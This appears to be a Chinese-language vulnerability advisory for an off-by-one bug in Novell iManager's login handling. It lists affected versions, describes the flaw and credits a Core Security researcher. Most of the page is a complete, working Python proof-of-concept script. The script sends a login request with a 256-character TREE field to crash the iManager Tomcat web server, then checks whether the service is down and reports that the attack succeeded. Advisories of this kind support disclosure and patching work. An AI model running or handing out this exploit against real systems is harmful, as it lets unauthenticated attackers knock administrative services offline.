漏洞起因
边界条件错误
危险等级
低
影响系统
Novell iManager 2.7.3
Novell iManager 2.7.2
Novell iManager 2.7.1
Novell iManager 2.5
Novell iManager 2.0.2
Novell iManager 2.0
Novell iManager 1.5
Novell iManager 2.7.3 FTF2
Novell iManager 2.7.0
Novell iManager 2.6.0
不受影响系统
Novell iManager 2.7.4
Novell iManager 2.7.3 FTF4
危害
远程攻击者可以利用漏洞使应用程序崩溃。
攻击所需条件
攻击者必须访问Novell iManager。
漏洞信息
Novell iManager是一款基于WEB的应用程序,可以使用无线设备管理、配置Novell eDirectory对象。
负责Novell iManager登录处理代码存在单字节错误,远程未验证用户可使iManager WEB服务程序崩溃。
iManager登录页面中的三个输入字段都定义了最大长度为256字节的大小,以限制每个字段可输入的字符数。但是,如果发送给WEB服务器的登陆请求中包含一个长度为256字符的TREE字段,iManager Tomcat web服务器会崩溃,导致应用程序不可用。
测试方法
#Usage: $ python poc.py <iManager_IP> <iManager_Port>
#E.g: $ python poc.py 192.168.0.1 48080
import socket
import sys
import time
import httplib
def server_uses_SSL(host, port):
#Try to determine if the server is using HTTP over SSL or not.
headers = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)’,
‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
‘Accept-Language’: ‘en-us,en;q=0.5’,
‘Accept-Charset’: ‘ISO-8859-1,utf-8;q=0.7,*;q=0.7’,
‘Connection’:’close’}
using_ssl = True
conn = httplib.HTTPSConnection(host, port)
try:
conn.request(‘GET’, ‘/nps/servlet/webacc’, headers=headers)
response = conn.getresponse()
except socket.sslerror:
using_ssl = False
finally:
conn.close()
return using_ssl
def post_urlencoded_data(host, port, selector, body, use_ssl, get_resp=True):
headers = { ‘User-Agent’:’Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)’,
‘Accept’:’text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8′,
‘Accept-Language’: ‘en-us,en;q=0.5’,
‘Accept-Charset’: ‘ISO-8859-1,utf-8;q=0.7,*;q=0.7’,
‘Referer’: ‘http://%s:%s%s’ % (host, port, ‘/nps/servlet/webacc’),
‘Content-Type’:’application/x-www-form-urlencoded’,
‘Content-Length’: str(len(body)),
‘Connection’:’close’}
if use_ssl:
conn = httplib.HTTPSConnection(host, port)
else:
conn = httplib.HTTPConnection(host, port)
conn.request(‘POST’, selector, body, headers)
html = ”
#This flag allows me to avoid keeping waiting for a server response in the last step, when the webserver is crashed
if get_resp:
response = conn.getresponse()
html = response.read()
conn.close()
return html
def getPostParameters():
params = ‘rank=primary&DoLogin=true&forceMaster=false’
params += ‘&username=admin&password=mipass&tree=%s&Entrada.x=27&Entrada.y=13’ % (‘A’ * 256)
return params
def main():
host = sys.argv[1]
port = int(sys.argv[2])
#Determine if the server uses plain HTTP (iManager Workstation) or HTTPS (iManager Server)
uses_ssl = server_uses_SSL(host, port)
if uses_ssl:
print ‘(+) The server uses HTTP over SSL. Guessed target: iManager Server.’
else:
print ‘(+) The server uses plain HTTP. Guessed target: iManager Workstation.’
print ‘(+) Sending login request with 256-character long TREE field…’
post_urlencoded_data(host, port, ‘/nps/servlet/webacc’, getPostParameters(), uses_ssl, False)
print ‘(+) Malicious request successfully sent.’
#Wait 10 seconds and try to connect again to iManager, to check if it’s down
print ‘(+) Waiting 10 seconds before trying to reconnect to iManager…’
time.sleep(10)
try:
print ‘(+) Trying to reconnect…’
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.close()
print ‘(!) Something went wrong. Novell iManager is still alive.’
except socket.error:
print ‘(*) Attack successful. Novell iManager is down.’
if __name__ == ‘__main__’:
main()
厂商解决方案
目前没有详细解决方案提供:
http://www.novell.com/products/consoles/imanager/features.html
漏洞提供者
Francisco Falcon from Core Security Technologies
0 条评论。